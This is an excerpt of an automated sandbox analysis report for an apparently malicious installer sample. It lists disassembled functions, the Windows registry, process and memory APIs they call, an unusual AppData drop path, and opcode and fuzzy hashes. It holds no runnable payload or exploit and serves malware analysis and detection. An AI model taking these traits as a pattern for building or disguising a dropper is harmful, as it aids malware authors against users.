                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CloseValuelstrlen
                                            • String ID: sarcoderma
                                            • API String ID: 2655323295-3317469366
                                            • Opcode ID: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                            • Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
                                            • Opcode Fuzzy Hash: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                            • Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58
                                            Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                            • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                            • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Close$Enum
                                            • String ID:
                                            • API String ID: 464197530-0
                                            • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                            • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                            • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                            • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                            Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00405BC8: CharNextW.USER32(?,?,00425EF0,?,00405C3C,00425EF0,00425EF0,?,?,74DF3420,0040597A,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405BD6
                                              • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                              • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                              • Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet,?,00000000,000000F0), ref: 0040164D
                                            Strings
                                            • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet, xrefs: 00401640
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea\Playlet
                                            • API String ID: 1892508949-192101639
                                            • Opcode ID: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                            • Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
                                            • Opcode Fuzzy Hash: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                            • Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E
                                            Function 0040611A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,: Completed,?,?,0040638E,80000002), ref: 00406160
                                            • RegCloseKey.KERNELBASE(?,?,0040638E,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,00000000,Completed), ref: 0040616B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID: : Completed
                                            • API String ID: 3356406503-2954849223
                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                            • Instruction ID: 8ef6f3e619af491bbf380fd7d91826ebef08e06ae3c58d0c48453c9b41c80383
                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                            • Instruction Fuzzy Hash: BF014872500209FBDF218F51C909ADB3BA8EB55364F01802AFD1AA61A1D678D964CBA4
                                            Function 00405831 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 0040585A
                                            • CloseHandle.KERNEL32(?), ref: 00405867
                                            Strings
                                            • Error launching installer, xrefs: 00405844
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                            • Instruction ID: 0b6998b7e6fa6c2388fbdd89280d1adf89017549f97d9b179fdab4837609bc7e
                                            • Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
                                            • Instruction Fuzzy Hash: ADE0BFB560020ABFEB109F65ED09F7B76ACFB14604F414535BD51F2150D7B4E8158A7C
                                            Function 00406D8B Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                            • Instruction ID: db5c32ec8170847eb5f60efc1784393b24ec0eb305c02a0c5cf020035e361845
                                            • Opcode Fuzzy Hash: 302b10b5f8a53204061198487595bde91d4e59eeb865b5b54b4ab13e5b29b8f6
                                            • Instruction Fuzzy Hash: 76A15571E04229CBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281C7786A86DF45
                                            Function 00406F8C Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                            • Instruction ID: 8e32eb5403c84004d501a5d2bb1c7049f427415ce0bc154380a8816354db292b
                                            • Opcode Fuzzy Hash: fe4323228985bcba61e3bbbb9c9244f74905e05ece4cf1ab09c593cabe40b1c4
                                            • Instruction Fuzzy Hash: AE914271E04228CBDF28CF98C8547ADBBB1FF44305F14816AD856BB281C778AA86DF45
                                            Function 00406CA2 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                            • Instruction ID: 030bbf204142f55243dad992a5db991e5d63a74ebaef12f83509f41b37c8d212
                                            • Opcode Fuzzy Hash: 938fb70cab063128a157af1098290c857e69407ac2924c0a6b94e5f41d13b3bc
                                            • Instruction Fuzzy Hash: BC813371E04228DFDF24CFA8C8447ADBBB1FB44305F25816AD856BB281C738A986DF55
                                            Function 004067A7 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                            • Instruction ID: 067318748fb0e7e332f05a89f7f4937fcdaac86c909a37b822a7e26141377c2a
                                            • Opcode Fuzzy Hash: a4a831d665342904e926e677d5e53c2d763209fb1dc1872ba2cc662cd0e71529
                                            • Instruction Fuzzy Hash: 84814571E04228DFDB28CFA9C8447ADBBB1FB44305F11816AD856BB2C1C778A986DF45
                                            Function 00406BF5 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                            • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                            • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                            • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                            Function 00406D13 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                            • Instruction ID: 95b660950287b107d15ca963a4456fab735294b344fdd2f3256912a70e30144d
                                            • Opcode Fuzzy Hash: b6213b912aa4c06ba450cadc729dd6194a23a0bdabbae65cbac8743ad0304bd8
                                            • Instruction Fuzzy Hash: A4713371E04228DBDF28CF98C844BADBBB1FF44305F15806AD856BB280C7789996DF45
                                            Function 00406C5F Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                            • Instruction ID: 7d50f74d422c9426a2654202d950de31cd619cd826110beab4429d7d99e33e8a
                                            • Opcode Fuzzy Hash: 64597932ebf2bb6f2d249f60c1a052c2706a55a0ac38294ae6599684583fce52
                                            • Instruction Fuzzy Hash: F9715671E04229DBDF28CF98C9447ADBBB1FF44305F11806AD856BB281C7389986DF44
                                            Function 00401B71 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GlobalFree.KERNEL32(00000000), ref: 00401BE1
                                            • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1842405041.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.1842388453.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842421497.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842438222.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1842555128.00000000004A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                            Similarity
                                            • API ID: Global$AllocFree
                                            • String ID: Noncyclical
                                            • API String ID: 3394109436-2594171315
                                            • Opcode ID: 0844196dee18cea9d56a4e77333d8774e68dd74a7cb5739370c83f54557c9c23
                                            • Instruction ID: dcb5b8d847a710274197b3f9eb455299827833f010be51817d6ecb77aa41e574
                                            • Opcode Fuzzy Hash: 0844196dee18cea9d56a4e77333d8774e68dd74a7cb5739370c83f54557c9c23
                                            • Instruction Fuzzy Hash: 5021CD72700100EFDB20EBA8CE8495E76B8AF84328725417BF902F72D1DB7D98518B2D
                                            Function 004024F2 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
